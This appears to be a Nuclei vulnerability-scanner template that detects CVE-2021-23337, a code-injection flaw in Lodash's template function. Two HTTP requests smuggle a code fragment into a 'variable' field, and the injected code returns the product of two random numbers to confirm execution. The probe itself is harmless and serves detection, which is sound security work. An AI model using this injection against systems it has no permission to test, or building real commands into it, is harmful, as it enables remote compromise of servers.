id: CVE-2021-23337 info: name: Lodash Template - Server-Side Template Injection (RCE) author: DhiyaneshDk severity: high description: | Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function. impact: | Attackers can execute arbitrary commands on the host system, leading to full system compromise. remediation: | Update to version 4.17.21 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-23337 - https://security.snyk.io/vuln/SNYK-JS-LODASH-1040724 - https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c - https://github.com/advisories/GHSA-35jh-r3h4-6jhm classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-23337 cwe-id: CWE-94 epss-score: 0.04314 epss-percentile: 0.89076 metadata: verified: true max-request: 2 vendor: lodash product: lodash shodan-query: http.component:"lodash" fofa-query: body="lodash" tags: cve,cve2021,lodash,ssti,rce,nodejs,javascript flow: http(1) || http(2) variables: randA: "{{rand_int(1000, 9999)}}" randB: "{{rand_int(1000, 9999)}}" http: - raw: - | POST /template HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"template":"<%= name %>","variable":") { return String({{randA}}*{{randB}}) }; with(obj","data":{"name":"test"}} matchers-condition: and matchers: - type: word part: body words: - "{{to_number(randA)*to_number(randB)}}" - type: status status: - 200 extractors: - type: regex part: body name: eval_result regex: - "[0-9]+" - raw: - | GET /render?tpl=hello&variable=)%7Breturn+String({{randA}}*{{randB}})%7D%3Bwith(obj HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "{{to_number(randA)*to_number(randB)}}" - type: status status: - 200 extractors: - type: regex part: body name: eval_result regex: - "[0-9]+" # digest: 4a0a00473045022100ac5807c4c01b0dd29b831be23e51c1ae42cdf9d7660d2bc629ab4df6ad11f581022018723c79fe0e252a82f4386ae574149c3a8a57c2b6c988d6704ef4ce31570f2a:922c64590222798bb761d5b6d8e72950